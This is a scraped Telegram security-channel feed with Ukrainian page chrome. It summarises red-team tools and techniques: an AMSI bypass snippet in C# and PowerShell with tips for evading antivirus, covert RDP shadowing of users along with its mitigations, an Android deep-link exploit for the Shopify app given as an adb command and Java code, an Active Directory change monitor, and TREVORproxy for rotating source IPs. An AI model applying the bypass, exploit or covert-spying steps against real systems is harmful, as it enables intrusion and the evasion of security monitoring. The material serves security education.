Security Analysis
- Offensive Security (Red Teaming / PenTesting) - BlueTeam (OperationSec, TreatHunting, DFIR) - Reverse Engineering / Malware Analysis - Web Security - Cryptography - Steganography - Forensics
Більше- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Триває завантаження даних...
Parameters DC - domain controller FQDN. Formatlist - output in list instead of table. ExcludelastLogonTimestamp - exclude lastLogonTimestamp events from output DumpAllObjects - dump all active directory before start. In case of changes It will show you all previous values. But in large domains use it on your own risk (time and resource consuming). Short - in output will be only AttributeName, AttributeValue, LastOriginChangeTime and Explanation. Output - create XML file with all output. ExcludeObjectGUID - exclude Active Directory object with specific GUID. Sleep - time interval between requests for USN number. By default - 30 seconds. USN - specify started USN. DisplayXML - display previous captured XML file. How to use Domain computer Just run module in powershell session from domain user. For better performance use domain controller FQDN instead of IP address. Non-domain computer Start powershell session with domain user with runas. Check that domain controller accessible. For better performance use domain controller FQDN instead of IP address.#RedTeam #BlueTeam @securation
Monitor changes in Active Directory with replication metadata - DrunkF0x/ADSpider
There is a low detection surface: statically: because the code profile is so short and it is hard to apply a signature on any part of the common .NET functionality used dynmically: because of the lack of hooked win32 API calls Because we are modifying JIT/IL memory which is hard for AV/EDR to monitor or has not been monitored at this point by a lot of vendors ! For some security products, modify method M to pass in empty argument string c. ! For CSHARP example, private static int M(string c, string s) { c = ""; return 1; } ! For POWERSHELL example, class TrollAMSI{static [int] M([string]$c, [string]$s){ $c = ""; return 1}} ! Refer to TrollAMSIdotnet for amsi bypass for Assembly.Load() Benefits No P/Invoke or win32 API calls used such as VirtualProtect hence more opsec safe No amsi.dll patching or byte patching for that matter در ادامه نکاتی را برای رعایت OpSec میتوان اشاره کرد:
STATIC: obfuscate "AmsiUtils" and "ScanContent" maybe? DYNAMIC: Nothing much really. Note that Add-Type method will leave disk artifacts, whereas hosting the compiled DLL on a webserver and using Load() is completely in memoryhttps://github.com/cybersectroll/TrollAMSI/tree/main #RedTeam #AMSI @securation
Contribute to cybersectroll/TrollAMSI development by creating an account on GitHub.
Learn about the Windows authentication protocols that are used within the Security Support Provider Interface (SSPI) architecture.
HKLM\Software\Policies\Microsoft\Windows NT\Terminal Servicesایجاد یا تغییر کرد هشدار داده شود. همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again#RedTeam #RDP @securation
How to spy on users on remote computers making only use of Windows' built-in functionality? This post will explain the steps to (ab)use Windows' Remote Desktop feature to view a remote user's desktop using native Windows functionality without them noticing it.
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'
Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);
https://hackerone.com/reports/637194
#Android
@SecurationTREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy: Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet. E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses. SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.) NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.#RedTeam #OpSec @securation
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...
На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.